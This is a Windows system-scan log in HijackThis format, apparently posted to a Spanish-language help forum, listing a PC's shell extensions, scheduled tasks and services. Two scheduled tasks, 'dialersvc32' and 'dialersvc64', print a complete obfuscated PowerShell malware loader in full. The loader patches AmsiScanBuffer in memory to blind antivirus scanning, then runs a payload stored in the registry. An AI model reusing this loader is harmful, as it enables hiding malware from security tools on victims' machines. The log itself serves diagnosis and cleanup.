O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe /NoUACCheck
O22 - Task (.job): (disabled) dialersvc64.job - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:UzHNWKPXJNtt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CbINdIGkKlaWGG,[Parameter(Position=1)][Type]$NsGdjxvggE)$LwujcLParTV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcce
O22 - Task (.job): dialersvc32.job - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:apixgIwtcgiR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wPRQswjtFJXSSW,[Parameter(Position=1)][Type]$owhDaShKYi)$FBvTuZUrqAz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcce
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_AC - C:\WINDOWS\system32\MusNotification.exe /RunOnAC RebootDialog (Microsoft)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_Battery - C:\WINDOWS\system32\MusNotification.exe /RunOnBattery RebootDialog (Microsoft)
O22 - Task: (disabled) Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Task: (disabled) AdvancedUpdater - C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe /silentall -nofreqcheck -nogui
O22 - Task: (disabled) AdvancedWindowsManager #1 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 110 -t 8080
O22 - Task: (disabled) AdvancedWindowsManager #2 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 111 -t 8080
O22 - Task: (disabled) AdvancedWindowsManager #3 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 112 -t 8080
O22 - Task: (disabled) AdvancedWindowsManager #4 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 113 -t 8080
O22 - Task: (disabled) AdvancedWindowsManager #5 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 114 -t 8080
O22 - Task: (disabled) AdvancedWindowsManager #6 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 115 -t 8080
O22 - Task: (disabled) BlueStacksHelper_nxt - C:\Program Files\BlueStacks_nxt\BlueStacksHelper.exe -sr
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Shell\FamilySafetyMonitorToastTask - {D2CBF5F7-5702-440B-8D8F-8203034A6B82},$(Arg0) - (no file)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: (update) \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker - C:\WINDOWS\system32\MusNotification.exe (Microsoft)
O22 - Task: ASC_SkipUac_JPD_TOWER - C:\Program Files (x86)\Advanced SystemCare Pro\ASC.exe /SkipUac
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineCore1d6ca0a2df327f9 - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: GoogleUpdateTaskMachineUA1d6ca0a2df5f82e - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: IMF_SkipUAC_JPD_TOWER - C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe /SkipUac
O22 - Task: Intel PTT EK Recertification - C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_76523213b78d9046\lib\IntelPTTEKRecertification.exe
O22 - Task: OneDrive Standalone Update Task-S-1-5-21-1640731472-3253829319-3592857273-500 - C:\Users\JPD_TOWER\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
O22 - Task: OneDrive Standalone Update Task-S-1-5-21-2819557380-2876920998-2071874008-500 - C:\Users\JPD_TOWER\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
O22 - Task: RealtekHDAudio - C:\WINDOWS\system32\config\systemprofile\AppData\Roaming\Realtek\HD\Update\RealtekHDAudio.exe
O22 - Task: SmartDefrag_AutoAnalyze - C:\Program Files (x86)\IObit\Smart Defr\AutoDefrag.exe /AUTOANALYZE (file missing)
O22 - Task: SmartDefrag_Update - C:\Program Files (x86)\IObit\Smart Defr\AutoUpdate.exe /autorun (file missing)
O22 - Task: \Microsoft\Windows\AppListBackup\Backup - {E0DCC2CC-3354-45F2-8914-519E07809082} - C:\WINDOWS\system32\AppListBackupLauncher.dll (Microsoft)
O22 - Task: \Microsoft\Windows\SMB\UninstallSMB1ClientTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Client"
O22 - Task: \Microsoft\Windows\SMB\UninstallSMB1ServerTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Server"
O22 - Task: \Microsoft\Windows\UpdateOrchestrator\AC Power Install - C:\WINDOWS\system32\usoclient.exe StartInstall (Microsoft)
O22 - Task: \Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
O22 - Task: dialersvc32 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:apixgIwtcgiR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wPRQswjtFJXSSW,[Parameter(Position=1)][Type]$owhDaShKYi)$FBvTuZUrqAz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$FBvTuZUrqAz.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$wPRQswjtFJXSSW).SetImplementationFlags('Runtime,Managed');$FBvTuZUrqAz.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$owhDaShKYi,$wPRQswjtFJXSSW).SetImplementationFlags('Runtime,Managed');Write-Output $FBvTuZUrqAz.CreateType();}$mJEMOhdwMnPlv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oGxzdhjRwzOuny=$mJEMOhdwMnPlv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RMSpemWbeIFtVxWOgIc=apixgIwtcgiR @([String])([IntPtr]);$thwUJXunSMzkqgVKpByquG=apixgIwtcgiR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdNgabHVMcn=$mJEMOhdwMnPlv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$YpWAVcyICIauve=$oGxzdhjRwzOuny.Invoke($Null,@([Object]$gdNgabHVMcn,[Object]('Load'+'LibraryA')));$toICsynFpdQrZsYGH=$oGxzdhjRwzOuny.Invoke($Null,@([Object]$gdNgabHVMcn,[Object]('Vir'+'tual'+'Pro'+'tect')));$uRHQaoB=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YpWAVcyICIauve,$RMSpemWbeIFtVxWOgIc).Invoke('a'+'m'+'si.dll');$pBBpMJVXgKwXOjxcU=$oGxzdhjRwzOuny.Invoke($Null,@([Object]$uRHQaoB,[Object]('Ams'+'iSc'+'an'+'Buffer')));$OQpAYpIaDJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($toICsynFpdQrZsYGH,$thwUJXunSMzkqgVKpByquG).Invoke($pBBpMJVXgKwXOjxcU,[uint32]8,4,[ref]$OQpAYpIaDJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$pBBpMJVXgKwXOjxcU,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($toICsynFpdQrZsYGH,$thwUJXunSMzkqgVKpByquG).Invoke($pBBpMJVXgKwXOjxcU,[uint32]8,0x20,[ref]$OQpAYpIaDJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: dialersvc64 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:UzHNWKPXJNtt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CbINdIGkKlaWGG,[Parameter(Position=1)][Type]$NsGdjxvggE)$LwujcLParTV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LwujcLParTV.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$CbINdIGkKlaWGG).SetImplementationFlags('Runtime,Managed');$LwujcLParTV.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NsGdjxvggE,$CbINdIGkKlaWGG).SetImplementationFlags('Runtime,Managed');Write-Output $LwujcLParTV.CreateType();}$ImrbaowEdYFgk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$JDrixjmDPdZFyB=$ImrbaowEdYFgk.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xGmqSgGwPVUzXdVZItw=UzHNWKPXJNtt @([String])([IntPtr]);$YORixZZAURGZuYDBLEluRz=UzHNWKPXJNtt @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BcdkVWHcYRF=$ImrbaowEdYFgk.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$VBIYzMBbTJBPhI=$JDrixjmDPdZFyB.Invoke($Null,@([Object]$BcdkVWHcYRF,[Object]('Load'+'LibraryA')));$SoPZBLQWIJfAtJkFq=$JDrixjmDPdZFyB.Invoke($Null,@([Object]$BcdkVWHcYRF,[Object]('Vir'+'tual'+'Pro'+'tect')));$ANsTbch=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VBIYzMBbTJBPhI,$xGmqSgGwPVUzXdVZItw).Invoke('a'+'m'+'si.dll');$atJoUAXptWUDZCHOd=$JDrixjmDPdZFyB.Invoke($Null,@([Object]$ANsTbch,[Object]('Ams'+'iSc'+'an'+'Buffer')));$FeUBAfvJCc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SoPZBLQWIJfAtJkFq,$YORixZZAURGZuYDBLEluRz).Invoke($atJoUAXptWUDZCHOd,[uint32]8,4,[ref]$FeUBAfvJCc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$atJoUAXptWUDZCHOd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SoPZBLQWIJfAtJkFq,$YORixZZAURGZuYDBLEluRz).Invoke($atJoUAXptWUDZCHOd,[uint32]8,0x20,[ref]$FeUBAfvJCc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
O23 - Service R2: Advanced SystemCare Service 13 - (AdvancedSystemCareService13) - C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
O23 - Service R2: Intel(R) Dynamic Application Loader Host Interface Service - (jhi_service) - C:\WINDOWS\System32\DriverStore\FileRepository\dal.inf_amd64_b5484efd38adbe8d\jhi_service.exe
O23 - Service R2: Intel(R) Management and Security Application Local Management Service - (LMS) - C:\WINDOWS\System32\DriverStore\FileRepository\lms.inf_amd64_fddb643595e0b8d0\LMS.exe
O23 - Service S2: Intel(R) TPM Provisioning Service - C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_76523213b78d9046\lib\TPMProvisioningService.exe
O23 - Service S2: Servicio de Google Update (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service S3: ArcSoft Connect Daemon - (ACDaemon) - C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
O23 - Service S3: Bluetooth Driver Management Service - (BcmBtRSupport) - C:\WINDOWS\system32\BtwRSupportService.exe
O23 - Service S3: Brother USB Application Controller - (USBAppControl) - C:\Program Files (x86)\Brother\iPrint&Scan\USBAppControl.exe
O23 - Service S3: Brother Workflow Application Controller - (WorkflowAppControl) - C:\Program Files (x86)\Brother\iPrint&Scan\WorkflowAppControl.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\100.0.4896.75\elevation_service.exe (file missing)
O23 - Service S3: Intel(R) Capability Licensing Service TCP IP Interface - C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_76523213b78d9046\lib\SocketHeciServer.exe
O23 - Service S3: Intel(R) Content Protection HDCP Service - (cplspcon) - C:\WINDOWS\System32\DriverStore\FileRepository\iigd_base.inf_amd64_6facd738cc4484c9\IntelCpHDCPSvc.exe
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\System32\DriverStore\FileRepository\iigd_base.inf_amd64_6facd738cc4484c9\IntelCpHeciSvc.exe
O23 - Service S3: Letasoft Sound Booster Service - (SoundBoosterService) - C:\Program Files (x86)\Letasoft Sound Booster\SoundBoosterService.exe
O23 - Service S3: Office 64 Source Engine - (ose64) - C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
O23 - Service S3: Servicio de Google Update (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: TeamViewer - C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
O23 - Service S3: spacedeskService - C:\WINDOWS\System32\spacedeskService.exe
En línea
